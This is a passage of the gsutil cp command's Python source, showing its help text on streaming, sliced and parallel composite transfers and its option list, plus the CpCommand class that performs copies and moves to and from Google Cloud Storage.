specify any special command line options to make this happen. If your upload
is interrupted you can restart the upload by running the same cp command that
you ran to start the upload. Until the upload has completed successfully, it
will not be visible at the destination object and will not replace any
existing object the upload is intended to overwrite. However, see the section
on PARALLEL COMPOSITE UPLOADS, which may leave temporary component objects in
place during the upload process.
Similarly, gsutil automatically performs resumable downloads (using standard
HTTP Range GET operations) whenever you use the cp command, unless the
destination is a stream. In this case, a partially downloaded temporary file
will be visible in the destination directory. Upon completion, the original
file is deleted and overwritten with the downloaded contents.
Resumable uploads and downloads store state information in files under
~/.gsutil, named by the destination object or file. If you attempt to resume a
transfer from a machine with a different directory, the transfer will start
over from scratch.
See also "gsutil help prod" for details on using resumable transfers
in production.
"""
_STREAMING_TRANSFERS_TEXT = """
<B>STREAMING TRANSFERS</B>
Use '-' in place of src_url or dst_url to perform a streaming
transfer. For example:
long_running_computation | gsutil cp - gs://my-bucket/obj
Streaming uploads using the JSON API (see "gsutil help apis") are buffered in
memory part-way back into the file and can thus retry in the event of network
or service problems.
Streaming transfers using the XML API do not support resumable
uploads/downloads. If you have a large amount of data to upload (say, more
than 100 MiB) it is recommended that you write the data to a local file and
then copy that file to the cloud rather than streaming it (and similarly for
large downloads).
WARNING: When performing streaming transfers gsutil does not compute a
checksum of the uploaded or downloaded data. Therefore, we recommend that
users either perform their own validation of the data or use non-streaming
transfers (which perform integrity checking automatically).
"""
_SLICED_OBJECT_DOWNLOADS_TEXT = """
<B>SLICED OBJECT DOWNLOADS</B>
gsutil uses HTTP Range GET requests to perform "sliced" downloads in parallel
when downloading large objects from Google Cloud Storage. This means that disk
space for the temporary download destination file will be pre-allocated and
byte ranges (slices) within the file will be downloaded in parallel. Once all
slices have completed downloading, the temporary file will be renamed to the
destination file. No additional local disk space is required for this
operation.
This feature is only available for Google Cloud Storage objects because it
requires a fast composable checksum (CRC32C) that can be used to verify the
data integrity of the slices. And because it depends on CRC32C, using sliced
object downloads also requires a compiled crcmod (see "gsutil help crcmod") on
the machine performing the download. If compiled crcmod is not available,
a non-sliced object download will instead be performed.
Note: since sliced object downloads cause multiple writes to occur at various
locations on disk, this mechanism can degrade performance for disks with slow
seek times, especially for large numbers of slices. While the default number
of slices is set small to avoid this problem, you can disable sliced object
download if necessary by setting the "sliced_object_download_threshold"
variable in the .boto config file to 0.
"""
_PARALLEL_COMPOSITE_UPLOADS_TEXT = """
<B>PARALLEL COMPOSITE UPLOADS</B>
gsutil can automatically use
`object composition <https://cloud.google.com/storage/docs/composite-objects>`_
to perform uploads in parallel for large, local files being uploaded to Google
Cloud Storage. If enabled (see next paragraph), a large file will be split
into component pieces that are uploaded in parallel and then composed in the
cloud (and the temporary components finally deleted). No additional local disk
space is required for this operation.
Using parallel composite uploads presents a tradeoff between upload
performance and download configuration: If you enable parallel composite
uploads your uploads will run faster, but someone will need to install a
compiled crcmod (see "gsutil help crcmod") on every machine where objects are
downloaded by gsutil or other Python applications. Note that for such uploads,
crcmod is required for downloading regardless of whether the parallel
composite upload option is on or not. For some distributions this is easy
(e.g., it comes pre-installed on MacOS), but in other cases some users have
found it difficult. Because of this, at present parallel composite uploads are
disabled by default. Google is actively working with a number of the Linux
distributions to get crcmod included with the stock distribution. Once that is
done we will re-enable parallel composite uploads by default in gsutil.
Parallel composite uploads should not be used with NEARLINE storage
class buckets, because doing this would incur an early deletion charge for
each component object.
To try parallel composite uploads you can run the command:
gsutil -o GSUtil:parallel_composite_upload_threshold=150M cp bigfile gs://your-bucket
where bigfile is larger than 150 MiB. When you do this notice that the upload
progress indicator continuously updates for several different uploads at once
(corresponding to each of the sections of the file being uploaded in
parallel), until the parallel upload completes. If after trying this you want
to enable parallel composite uploads for all of your future uploads
(notwithstanding the caveats mentioned earlier), you can uncomment and set the
"parallel_composite_upload_threshold" config value in your .boto configuration
file to this value.
Note that the crcmod problem only impacts downloads via Python applications
(such as gsutil). If all users who need to download the data using gsutil or
other Python applications can install crcmod, or if no Python users will
need to download your objects, it makes sense to enable parallel composite
uploads (see above). For example, if you use gsutil to upload video assets,
and those assets will only ever be served via a Java application, it would
make sense to enable parallel composite uploads on your machine (there are
efficient CRC32C implementations available in Java).
If a parallel composite upload fails prior to composition, re-running the
gsutil command will take advantage of resumable uploads for the components
that failed, and the component objects will be deleted after the first
successful attempt. Any temporary objects that were uploaded successfully
before gsutil failed will still exist until the upload is completed
successfully. The temporary objects will be named in the following fashion:
<random ID>%s<hash>
where <random ID> is a numerical value, and <hash> is an MD5 hash (not related
to the hash of the contents of the file or object).
To avoid leaving temporary objects around, you should make sure to check the
exit status from the gsutil command. This can be done in a bash script, for
example, by doing:
if ! gsutil cp ./local-file gs://your-bucket/your-object; then
<< Code that handles failures >>
fi
Or, for copying a directory, use this instead:
if ! gsutil cp -c -L cp.log -r ./dir gs://bucket; then
<< Code that handles failures >>
fi
One important caveat is that files uploaded using parallel composite uploads
are subject to a maximum number of components limit. For example, if you
upload a large file that gets split into %d components, and try to compose it
with another object with %d components, the operation will fail because it
exceeds the %d component limit. If you wish to compose an object later and the
component limit is a concern, it is recommended that you disable parallel
composite uploads for that transfer.
Also note that an object uploaded using parallel composite uploads will have a
CRC32C hash, but it will not have an MD5 hash (and because of that, users who
download the object must have crcmod installed, as noted earlier). For details
see "gsutil help crc32c".
Parallel composite uploads can be disabled by setting the
"parallel_composite_upload_threshold" variable in the .boto config file to 0.
""" % (PARALLEL_UPLOAD_TEMP_NAMESPACE, 10, MAX_COMPONENT_COUNT - 9,
MAX_COMPONENT_COUNT)
# The module-level string fragments below are concatenated (in order) into
# _DETAILED_HELP_TEXT, which backs "gsutil help cp".  Several sibling
# fragments (_SYNOPSIS_TEXT, _DESCRIPTION_TEXT, etc.) are defined earlier
# in this file, outside this excerpt.
# NOTE(review): the original leading indentation inside these help strings
# was not preserved in this copy of the file; verify the rendered help
# layout against the upstream gsutil source before shipping.

# How to redirect gsutil's temp-file directory (TMPDIR) when the default
# location lacks space.
_CHANGING_TEMP_DIRECTORIES_TEXT = """
<B>CHANGING TEMP DIRECTORIES</B>
gsutil writes data to a temporary directory in several cases:
- when compressing data to be uploaded (see the -z and -Z options)
- when decompressing data being downloaded (when the data has
Content-Encoding:gzip, e.g., as happens when uploaded using gsutil cp -z
or gsutil cp -Z)
- when running integration tests (using the gsutil test command)
In these cases it's possible the temp file location on your system that
gsutil selects by default may not have enough space. If gsutil runs out of
space during one of these operations (e.g., raising
"CommandException: Inadequate temp space available to compress <your file>"
during a gsutil cp -z operation), you can change where it writes these
temp files by setting the TMPDIR environment variable. On Linux and MacOS
you can do this either by running gsutil this way:
TMPDIR=/some/directory gsutil cp ...
or by adding this line to your ~/.bashrc file and then restarting the shell
before running gsutil:
export TMPDIR=/some/directory
On Windows 7 you can change the TMPDIR environment variable from Start ->
Computer -> System -> Advanced System Settings -> Environment Variables.
You need to reboot after making this change for it to take effect. (Rebooting
is not necessary after running the export command on Linux and MacOS.)
"""

# Warning about special file types (sockets, device files, pipes) that
# gsutil cp does not support as sources.
_COPYING_SPECIAL_FILES_TEXT = """
<B>COPYING SPECIAL FILES</B>
gsutil cp does not support copying special file types such as sockets, device
files, named pipes, or any other non-standard files intended to represent an
operating system resource. You should not run gsutil cp with sources that
include such files (for example, recursively copying the root directory on
Linux that includes /dev ). If you do, gsutil cp may fail or hang.
"""

# Documentation for every public command-line flag parsed by
# CpCommand._ParseOpts (see CP_SUB_ARGS below for the getopt spec).
_OPTIONS_TEXT = """
<B>OPTIONS</B>
-a canned_acl Sets named canned_acl when uploaded objects created. See
"gsutil help acls" for further details.
-A Copy all source versions from a source buckets/folders.
If not set, only the live version of each source object is
copied. Note: this option is only useful when the destination
bucket has versioning enabled.
-c If an error occurs, continue to attempt to copy the remaining
files. If any copies were unsuccessful, gsutil's exit status
will be non-zero even if this flag is set. This option is
implicitly set when running "gsutil -m cp...". Note: -c only
applies to the actual copying operation. If an error occurs
while iterating over the files in the local directory (e.g.,
invalid Unicode file name) gsutil will print an error message
and abort.
-D Copy in "daisy chain" mode, i.e., copying between two buckets
by hooking a download to an upload, via the machine where
gsutil is run. This stands in contrast to the default, where
data are copied between two buckets "in the cloud", i.e.,
without needing to copy via the machine where gsutil runs.
By default, a "copy in the cloud" when the source is a
composite object will retain the composite nature of the
object. However, Daisy chain mode can be used to change a
composite object into a non-composite object. For example:
gsutil cp -D -p gs://bucket/obj gs://bucket/obj_tmp
gsutil mv -p gs://bucket/obj_tmp gs://bucket/obj
Note: Daisy chain mode is automatically used when copying
between providers (e.g., to copy data from Google Cloud Storage
to another provider).
-e Exclude symlinks. When specified, symbolic links will not be
copied.
-I Causes gsutil to read the list of files or objects to copy from
stdin. This allows you to run a program that generates the list
of files to upload/download.
-L <file> Outputs a manifest log file with detailed information about
each item that was copied. This manifest contains the following
information for each item:
- Source path.
- Destination path.
- Source size.
- Bytes transferred.
- MD5 hash.
- UTC date and time transfer was started in ISO 8601 format.
- UTC date and time transfer was completed in ISO 8601 format.
- Upload id, if a resumable upload was performed.
- Final result of the attempted transfer, success or failure.
- Failure details, if any.
If the log file already exists, gsutil will use the file as an
input to the copy process, and will also append log items to
the existing file. Files/objects that are marked in the
existing log file as having been successfully copied (or
skipped) will be ignored. Files/objects without entries will be
copied and ones previously marked as unsuccessful will be
retried. This can be used in conjunction with the -c option to
build a script that copies a large number of objects reliably,
using a bash script like the following:
until gsutil cp -c -L cp.log -r ./dir gs://bucket; do
sleep 1
done
The -c option will cause copying to continue after failures
occur, and the -L option will allow gsutil to pick up where it
left off without duplicating work. The loop will continue
running as long as gsutil exits with a non-zero status (such a
status indicates there was at least one failure during the
gsutil run).
Note: If you're trying to synchronize the contents of a
directory and a bucket (or two buckets), see
"gsutil help rsync".
-n No-clobber. When specified, existing files or objects at the
destination will not be overwritten. Any items that are skipped
by this option will be reported as being skipped. This option
will perform an additional GET request to check if an item
exists before attempting to upload the data. This will save
retransmitting data, but the additional HTTP requests may make
small object transfers slower and more expensive.
-p Causes ACLs to be preserved when copying in the cloud. Note
that this option has performance and cost implications when
using the XML API, as it requires separate HTTP calls for
interacting with ACLs. (There are no such performance or cost
implications when using the -p option with the JSON API.) The
performance issue can be mitigated to some degree by using
gsutil -m cp to cause parallel copying. Note that this option
only works if you have OWNER access to all of the objects that
are copied.
You can avoid the additional performance and cost of using
cp -p if you want all objects in the destination bucket to end
up with the same ACL by setting a default object ACL on that
bucket instead of using cp -p. See "gsutil help defacl".
Note that it's not valid to specify both the -a and -p options
together.
-P Causes POSIX attributes to be preserved when objects are
copied. With this feature enabled, gsutil cp will copy fields
provided by stat. These are the user ID of the owner, the group
ID of the owning group, the mode (permissions) of the file, and
the access/modification time of the file. For downloads, these
attributes will only be set if the source objects were uploaded
with this flag enabled.
On Windows, this flag will only set and restore access time and
modification time. This is because Windows doesn't have a
notion of POSIX uid/gid/mode.
-R, -r The -R and -r options are synonymous. Causes directories,
buckets, and bucket subdirectories to be copied recursively.
If you neglect to use this option for an upload, gsutil will
copy any files it finds and skip any directories. Similarly,
neglecting to specify this option for a download will cause
gsutil to copy any objects at the current bucket directory
level, and skip any subdirectories.
-s <class> The storage class of the destination object(s), otherwise the
default storage class from the destination bucket will be used.
Not valid for copying to non-cloud destinations.
-U Skip objects with unsupported object types instead of failing.
Unsupported object types are Amazon S3 Objects in the GLACIER
storage class.
-v Requests that the version-specific URL for each uploaded object
be printed. Given this URL you can make future upload requests
that are safe in the face of concurrent updates, because Google
Cloud Storage will refuse to perform the update if the current
object version doesn't match the version-specific URL. See
"gsutil help versions" for more details.
-z <ext,...> Applies gzip content-encoding to file uploads with the given
extensions. This is useful when uploading files with
compressible content (such as .js, .css, or .html files)
because it saves network bandwidth and space in Google Cloud
Storage, which in turn reduces storage costs.
When you specify the -z option, the data from your files is
compressed before it is uploaded, but your actual files are
left uncompressed on the local disk. The uploaded objects
retain the Content-Type and name of the original files but are
given a Content-Encoding header with the value "gzip" to
indicate that the object data stored are compressed on the
Google Cloud Storage servers.
For example, the following command:
gsutil cp -z html -a public-read cattypes.html gs://mycats
will do all of the following:
- Upload as the object gs://mycats/cattypes.html (cp command)
- Set the Content-Type to text/html (based on file extension)
- Compress the data in the file cattypes.html (-z option)
- Set the Content-Encoding to gzip (-z option)
- Set the ACL to public-read (-a option)
- If a user tries to view cattypes.html in a browser, the
browser will know to uncompress the data based on the
Content-Encoding header, and to render it as HTML based on
the Content-Type header.
Note that if you download an object with Content-Encoding:gzip
gsutil will decompress the content before writing the local
file.
-Z Applies gzip content-encoding to file uploads. This option
works like the -z option described above, but it applies to
all uploaded files, regardless of extension.
Warning: If you use this option and some of the source files
don't compress well (e.g., that's often true of binary data),
this option may result in files taking up more space in the
cloud than they would if left uncompressed.
"""

# Full help text for "gsutil help cp": all section fragments joined with
# blank lines, in display order.
_DETAILED_HELP_TEXT = '\n\n'.join([_SYNOPSIS_TEXT,
                                   _DESCRIPTION_TEXT,
                                   _NAME_CONSTRUCTION_TEXT,
                                   _SUBDIRECTORIES_TEXT,
                                   _COPY_IN_CLOUD_TEXT,
                                   _CHECKSUM_VALIDATION_TEXT,
                                   _RETRY_HANDLING_TEXT,
                                   _RESUMABLE_TRANSFERS_TEXT,
                                   _STREAMING_TRANSFERS_TEXT,
                                   _SLICED_OBJECT_DOWNLOADS_TEXT,
                                   _PARALLEL_COMPOSITE_UPLOADS_TEXT,
                                   _CHANGING_TEMP_DIRECTORIES_TEXT,
                                   _COPYING_SPECIAL_FILES_TEXT,
                                   _OPTIONS_TEXT])

# getopt-style sub-argument spec consumed by CpCommand._ParseOpts (a
# trailing ':' means the flag takes a value).  Includes the deprecated -t
# and the internal-use -M/-N flags, which are intentionally undocumented
# in _OPTIONS_TEXT above.
CP_SUB_ARGS = 'a:AcDeIL:MNnpPrRs:tUvz:Z'
def _CopyFuncWrapper(cls, args, thread_state=None):
  """Top-level wrapper passed to Command.Apply for (possibly parallel) copies.

  Forwards to CpCommand.CopyFunc, pinning preserve_posix to the value that
  was parsed from the -P flag in _ParseOpts (cls.preserve_posix_attrs).
  `cls` is the CpCommand instance (Apply's callback convention).
  """
  cls.CopyFunc(args, thread_state=thread_state,
               preserve_posix=cls.preserve_posix_attrs)
def _CopyExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
cls.logger.error(str(e))
cls.op_failure_count += 1
cls.logger.debug('\n\nEncountered exception while copying:\n%s\n',
traceback.format_exc())
def _RmExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
cls.logger.error(str(e))
class CpCommand(Command):
  """Implementation of gsutil cp command.

  Note that CpCommand is run for both gsutil cp and gsutil mv. The latter
  happens by MvCommand calling CpCommand and passing the hidden (undocumented)
  -M option. This allows the copy and remove needed for each mv to run
  together (rather than first running all the cp's and then all the rm's, as
  we originally had implemented), which in turn avoids the following problem
  with removing the wrong objects: starting with a bucket containing only
  the object gs://bucket/obj, say the user does:
    gsutil mv gs://bucket/* gs://bucket/d.txt
  If we ran all the cp's and then all the rm's and we didn't expand the wildcard
  first, the cp command would first copy gs://bucket/obj to gs://bucket/d.txt,
  and the rm command would then remove that object. In the implementation
  prior to gsutil release 3.12 we avoided this by building a list of objects
  to process and then running the copies and then the removes; but building
  the list up front limits scalability (compared with the current approach
  of processing the bucket listing iterator on the fly).
  """

  # Command specification. See base class for documentation.
  command_spec = Command.CreateCommandSpec(
      'cp',
      command_name_aliases=['copy'],
      usage_synopsis=_SYNOPSIS,
      min_args=1,
      max_args=NO_MAX,
      # -t is deprecated but leave intact for now to avoid breakage.
      supported_sub_args=CP_SUB_ARGS,
      file_url_ok=True,
      provider_url_ok=False,
      urls_start_arg=0,
      gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
      gs_default_api=ApiSelector.JSON,
      supported_private_args=['testcallbackfile='],
      argparse_arguments=[
          CommandArgument.MakeZeroOrMoreCloudOrFileURLsArgument()
      ]
  )

  # Help specification. See help_provider.py for documentation.
  help_spec = Command.HelpSpec(
      help_name='cp',
      help_name_aliases=['copy'],
      help_type='command_help',
      help_one_line_summary='Copy files and objects',
      help_text=_DETAILED_HELP_TEXT,
      subcommand_help_text={},
  )

  # pylint: disable=too-many-statements
  def CopyFunc(self, name_expansion_result, thread_state=None,
               preserve_posix=False):
    """Worker function for performing the actual copy (and rm, for mv).

    Invoked (via _CopyFuncWrapper) once per expanded source URL, possibly
    from multiple threads/processes when -m is in effect.  Validates the
    source/destination pair, performs the copy via copy_helper.PerformCopy,
    updates the manifest (-L) if one is in use, and — for mv — deletes the
    source after a successful copy.  Accumulates bytes copied into
    self.total_bytes_transferred under self.stats_lock.
    """
    gsutil_api = GetCloudApiInstance(self, thread_state=thread_state)
    copy_helper_opts = copy_helper.GetCopyHelperOpts()
    # Report errors as coming from "mv" when we were invoked from mv.py
    # (hidden -M option; see class docstring).
    if copy_helper_opts.perform_mv:
      cmd_name = 'mv'
    else:
      cmd_name = self.command_name
    src_url = name_expansion_result.source_storage_url
    exp_src_url = name_expansion_result.expanded_storage_url
    src_url_names_container = name_expansion_result.names_container
    have_multiple_srcs = name_expansion_result.is_multi_source_request

    if src_url.IsCloudUrl() and src_url.IsProvider():
      raise CommandException(
          'The %s command does not allow provider-only source URLs (%s)' %
          (cmd_name, src_url))
    if preserve_posix and src_url.IsFileUrl() and src_url.IsStream():
      raise CommandException('Cannot preserve POSIX attributes with a stream.')
    if have_multiple_srcs:
      copy_helper.InsistDstUrlNamesContainer(
          self.exp_dst_url, self.have_existing_dst_container, cmd_name)

    # Various GUI tools (like the GCS web console) create placeholder objects
    # ending with '/' when the user creates an empty directory. Normally these
    # tools should delete those placeholders once objects have been written
    # "under" the directory, but sometimes the placeholders are left around. We
    # need to filter them out here, otherwise if the user tries to rsync from
    # GCS to a local directory it will result in a directory/file conflict
    # (e.g., trying to download an object called "mydata/" where the local
    # directory "mydata" exists).
    if IsCloudSubdirPlaceholder(exp_src_url):
      # We used to output the message 'Skipping cloud sub-directory placeholder
      # object...' but we no longer do so because it caused customer confusion.
      return

    # -L resumption: skip anything the manifest already recorded as done.
    if copy_helper_opts.use_manifest and self.manifest.WasSuccessful(
        exp_src_url.url_string):
      return

    if copy_helper_opts.perform_mv:
      if name_expansion_result.names_container:
        # Use recursion_requested when performing name expansion for the
        # directory mv case so we can determine if any of the source URLs are
        # directories (and then use cp -r and rm -r to perform the move, to
        # match the behavior of Linux mv (which when moving a directory moves
        # all the contained files).
        self.recursion_requested = True
        # Disallow wildcard src URLs when moving directories, as supporting it
        # would make the name transformation too complex and would also be
        # dangerous (e.g., someone could accidentally move many objects to the
        # wrong name, or accidentally overwrite many objects).
        if ContainsWildcard(src_url.url_string):
          raise CommandException('The mv command disallows naming source '
                                 'directories using wildcards')

    # With multiple sources and a local destination that doesn't exist yet,
    # create the destination directory so downloads have somewhere to land.
    if (self.exp_dst_url.IsFileUrl()
        and not os.path.exists(self.exp_dst_url.object_name)
        and have_multiple_srcs):
      os.makedirs(self.exp_dst_url.object_name)

    dst_url = copy_helper.ConstructDstUrl(
        src_url, exp_src_url, src_url_names_container, have_multiple_srcs,
        self.exp_dst_url, self.have_existing_dst_container,
        self.recursion_requested, preserve_posix=preserve_posix)
    dst_url = copy_helper.FixWindowsNaming(src_url, dst_url)

    copy_helper.CheckForDirFileConflict(exp_src_url, dst_url)
    if copy_helper.SrcDstSame(exp_src_url, dst_url):
      raise CommandException('%s: "%s" and "%s" are the same file - '
                             'abort.' % (cmd_name, exp_src_url, dst_url))

    if dst_url.IsCloudUrl() and dst_url.HasGeneration():
      raise CommandException('%s: a version-specific URL\n(%s)\ncannot be '
                             'the destination for gsutil cp - abort.'
                             % (cmd_name, dst_url))

    if not dst_url.IsCloudUrl() and copy_helper_opts.dest_storage_class:
      raise CommandException('Cannot specify storage class for a non-cloud '
                             'destination: %s' % dst_url)

    # Source object metadata (if any) arrives JSON-serialized from the name
    # expansion iterator; deserialize it for PerformCopy.
    src_obj_metadata = None
    if name_expansion_result.expanded_result:
      src_obj_metadata = encoding.JsonToMessage(
          apitools_messages.Object, name_expansion_result.expanded_result)

    # For -P uploads, capture the local file's POSIX attributes (uid, gid,
    # mode, atime, mtime) into the object's custom metadata.
    if src_url.IsFileUrl() and preserve_posix:
      if not src_obj_metadata:
        src_obj_metadata = apitools_messages.Object()
      mode, _, _, _, uid, gid, _, atime, mtime, _ = os.stat(
          exp_src_url.object_name)
      mode = ConvertModeToBase8(mode)
      posix_attrs = POSIXAttributes(atime=atime, mtime=mtime, uid=uid, gid=gid,
                                    mode=mode)
      custom_metadata = apitools_messages.Object.MetadataValue(
          additionalProperties=[])
      SerializeFileAttributesToObjectMetadata(posix_attrs, custom_metadata,
                                              preserve_posix=preserve_posix)
      src_obj_metadata.metadata = custom_metadata
    # For downloads, verify up front that applying the stored POSIX
    # attributes would leave the local file accessible; refuse the copy
    # (when -P is set) rather than creating an orphaned file.
    if src_obj_metadata and dst_url.IsFileUrl():
      posix_attrs = DeserializeFileAttributesFromObjectMetadata(
          src_obj_metadata, src_url.url_string)
      mode = posix_attrs.mode.permissions
      valid, err = ValidateFilePermissionAccess(src_url.url_string,
                                                uid=posix_attrs.uid,
                                                gid=posix_attrs.gid,
                                                mode=mode)
      if preserve_posix and not valid:
        logging.getLogger().critical(err)
        raise CommandException('This sync will orphan file(s), please fix their'
                               ' permissions before trying again.')

    bytes_transferred = 0
    try:
      if copy_helper_opts.use_manifest:
        self.manifest.Initialize(
            exp_src_url.url_string, dst_url.url_string)
      (_, bytes_transferred, result_url, md5) = (
          copy_helper.PerformCopy(
              self.logger, exp_src_url, dst_url, gsutil_api,
              self, _CopyExceptionHandler, src_obj_metadata=src_obj_metadata,
              allow_splitting=True, headers=self.headers,
              manifest=self.manifest, gzip_exts=self.gzip_exts,
              preserve_posix=preserve_posix))
      if copy_helper_opts.use_manifest:
        if md5:
          self.manifest.Set(exp_src_url.url_string, 'md5', md5)
        self.manifest.SetResult(
            exp_src_url.url_string, bytes_transferred, 'OK')
      if copy_helper_opts.print_ver:
        # Some cases don't return a version-specific URL (e.g., if destination
        # is a file).
        self.logger.info('Created: %s', result_url)
    except ItemExistsError:
      # Raised under -n (no-clobber) when the destination already exists.
      message = 'Skipping existing item: %s' % dst_url
      self.logger.info(message)
      if copy_helper_opts.use_manifest:
        self.manifest.SetResult(exp_src_url.url_string, 0, 'skip', message)
    except SkipUnsupportedObjectError, e:
      # Raised under -U for object types gsutil can't transfer.
      message = ('Skipping item %s with unsupported object type %s' %
                 (exp_src_url.url_string, e.unsupported_type))
      self.logger.info(message)
      if copy_helper_opts.use_manifest:
        self.manifest.SetResult(exp_src_url.url_string, 0, 'skip', message)
    except copy_helper.FileConcurrencySkipError, e:
      self.logger.warn('Skipping copy of source URL %s because destination URL '
                       '%s is already being copied by another gsutil process '
                       'or thread (did you specify the same source URL twice?) '
                       % (src_url, dst_url))
    except Exception, e:  # pylint: disable=broad-except
      if (copy_helper_opts.no_clobber and
          copy_helper.IsNoClobberServerException(e)):
        message = 'Rejected (noclobber): %s' % dst_url
        self.logger.info(message)
        if copy_helper_opts.use_manifest:
          self.manifest.SetResult(
              exp_src_url.url_string, 0, 'skip', message)
      elif self.continue_on_error:
        # -c: record the failure and keep going.
        message = 'Error copying %s: %s' % (src_url, str(e))
        self.op_failure_count += 1
        self.logger.error(message)
        if copy_helper_opts.use_manifest:
          self.manifest.SetResult(
              exp_src_url.url_string, 0, 'error',
              RemoveCRLFFromString(message))
      else:
        if copy_helper_opts.use_manifest:
          self.manifest.SetResult(
              exp_src_url.url_string, 0, 'error', str(e))
        raise
    else:
      # mv: the copy succeeded, so it is now safe to delete the source.
      if copy_helper_opts.perform_mv:
        self.logger.info('Removing %s...', exp_src_url)
        if exp_src_url.IsCloudUrl():
          gsutil_api.DeleteObject(exp_src_url.bucket_name,
                                  exp_src_url.object_name,
                                  generation=exp_src_url.generation,
                                  provider=exp_src_url.scheme)
        else:
          os.unlink(exp_src_url.object_name)

    with self.stats_lock:
      # TODO: Remove stats_lock; we should be able to calculate bytes
      # transferred from StatusMessages posted by operations within PerformCopy.
      self.total_bytes_transferred += bytes_transferred

  # Command entry point.
  def RunCommand(self):
    """Runs the cp (or, via -M, mv) command; returns 0 on success.

    Raises CommandException (with a non-zero exit) if any transfer failed.
    """
    copy_helper_opts = self._ParseOpts()

    self.total_bytes_transferred = 0

    # A trailing '-' (or 'file://-') destination means stream to stdout.
    if self.args[-1] == '-' or self.args[-1] == 'file://-':
      if self.preserve_posix_attrs:
        raise CommandException('Cannot preserve POSIX attributes with a '
                               'stream.')
      return CatHelper(self).CatUrlStrings(self.args[:-1])

    if copy_helper_opts.read_args_from_stdin:
      if len(self.args) != 1:
        raise CommandException('Source URLs cannot be specified with -I option')
      url_strs = StdinIterator()
    else:
      if len(self.args) < 2:
        raise CommandException('Wrong number of arguments for "cp" command.')
      url_strs = self.args[:-1]

    (self.exp_dst_url, self.have_existing_dst_container) = (
        copy_helper.ExpandUrlToSingleBlr(self.args[-1], self.gsutil_api,
                                         self.debug, self.project_id))

    name_expansion_iterator = NameExpansionIterator(
        self.command_name, self.debug,
        self.logger, self.gsutil_api, url_strs,
        self.recursion_requested or copy_helper_opts.perform_mv,
        project_id=self.project_id, all_versions=self.all_versions,
        continue_on_error=self.continue_on_error or self.parallel_operations,
        bucket_listing_fields=GetSourceFieldsNeededForCopy(
            self.exp_dst_url.IsCloudUrl(),
            copy_helper_opts.skip_unsupported_objects,
            copy_helper_opts.preserve_acl,
            preserve_posix=self.preserve_posix_attrs,
            delete_source=copy_helper_opts.perform_mv))

    # Because cp may have multiple source URLs, we wrap the name expansion
    # iterator in order to collect analytics.
    name_expansion_iterator = SourceUrlTypeIterator(
        name_expansion_iterator=name_expansion_iterator,
        is_daisy_chain=copy_helper_opts.daisy_chain,
        dst_url=self.exp_dst_url)

    seek_ahead_iterator = None
    # Cannot seek ahead with stdin args, since we can only iterate them
    # once without buffering in memory.
    if not copy_helper_opts.read_args_from_stdin:
      seek_ahead_iterator = SeekAheadNameExpansionIterator(
          self.command_name, self.debug, self.GetSeekAheadGsutilApi(),
          url_strs, self.recursion_requested or copy_helper_opts.perform_mv,
          all_versions=self.all_versions, project_id=self.project_id)

    # Use a lock to ensure accurate statistics in the face of
    # multi-threading/multi-processing.
    self.stats_lock = CreateLock()

    # Tracks if any copies failed.
    self.op_failure_count = 0

    # Start the clock.
    start_time = time.time()

    # Tuple of attributes to share/manage across multiple processes in
    # parallel (-m) mode.
    shared_attrs = ('op_failure_count', 'total_bytes_transferred')

    # Perform copy requests in parallel (-m) mode, if requested, using
    # configured number of parallel processes and threads. Otherwise,
    # perform requests with sequential function calls in current process.
    self.Apply(_CopyFuncWrapper, name_expansion_iterator,
               _CopyExceptionHandler, shared_attrs,
               fail_on_error=(not self.continue_on_error),
               seek_ahead_iterator=seek_ahead_iterator)
    self.logger.debug(
        'total_bytes_transferred: %d', self.total_bytes_transferred)

    end_time = time.time()
    self.total_elapsed_time = end_time - start_time
    self.total_bytes_per_second = CalculateThroughput(
        self.total_bytes_transferred, self.total_elapsed_time)
    LogPerformanceSummaryParams(
        has_file_dst=self.exp_dst_url.IsFileUrl(),
        has_cloud_dst=self.exp_dst_url.IsCloudUrl(),
        avg_throughput=self.total_bytes_per_second,
        total_bytes_transferred=self.total_bytes_transferred,
        total_elapsed_time=self.total_elapsed_time,
        uses_fan=self.parallel_operations,
        is_daisy_chain=copy_helper_opts.daisy_chain,
        provider_types=[self.exp_dst_url.scheme])

    if self.debug >= DEBUGLEVEL_DUMP_REQUESTS:
      # Note that this only counts the actual GET and PUT bytes for the copy
      # - not any transfers for doing wildcard expansion, the initial
      # HEAD/GET request performed to get the object metadata, etc.
      if self.total_bytes_transferred != 0:
        self.logger.info(
            'Total bytes copied=%d, total elapsed time=%5.3f secs (%sps)',
            self.total_bytes_transferred, self.total_elapsed_time,
            MakeHumanReadable(self.total_bytes_per_second))

    if self.op_failure_count:
      plural_str = 's' if self.op_failure_count > 1 else ''
      raise CommandException('%d file%s/object%s could not be transferred.' % (
          self.op_failure_count, plural_str, plural_str))

    return 0

  def _ParseOpts(self):
    """Parses sub-options for cp; returns a CopyHelperOpts.

    Options shared with the Command parent class (e.g. -c, -e, -r) are
    stored on self; the rest are packaged into the returned
    CreateCopyHelperOpts(...) object.  Also sets self.gzip_exts,
    self.manifest, self.preserve_posix_attrs, and self.canned.
    """
    # TODO: Arrange variables initialized here in alphabetical order.
    perform_mv = False
    # exclude_symlinks is handled by Command parent class, so save in Command
    # state rather than CopyHelperOpts.
    self.exclude_symlinks = False
    no_clobber = False
    # continue_on_error is handled by Command parent class, so save in Command
    # state rather than CopyHelperOpts.
    self.continue_on_error = False
    daisy_chain = False
    read_args_from_stdin = False
    print_ver = False
    use_manifest = False
    preserve_acl = False
    self.preserve_posix_attrs = False
    canned_acl = None
    # canned_acl is handled by a helper function in parent
    # Command class, so save in Command state rather than CopyHelperOpts.
    self.canned = None
    self.all_versions = False
    self.skip_unsupported_objects = False
    # Files matching these extensions should be gzipped before uploading.
    gzip_arg_exts = None
    gzip_arg_all = None
    test_callback_file = None
    dest_storage_class = None
    # self.recursion_requested initialized in command.py (so can be checked
    # in parent class for all commands).
    self.manifest = None
    if self.sub_opts:
      for o, a in self.sub_opts:
        # NOTE: the '-a', '-A' and '-c' checks below use 'if' rather than
        # 'elif'; since each `o` equals at most one flag string this does
        # not change behavior.
        if o == '-a':
          canned_acl = a
          self.canned = True
        if o == '-A':
          self.all_versions = True
        if o == '-c':
          self.continue_on_error = True
        elif o == '-D':
          daisy_chain = True
        elif o == '-e':
          self.exclude_symlinks = True
        elif o == '--testcallbackfile':
          # File path of a pickled class that implements ProgressCallback.call.
          # Used for testing transfer interruptions and resumes.
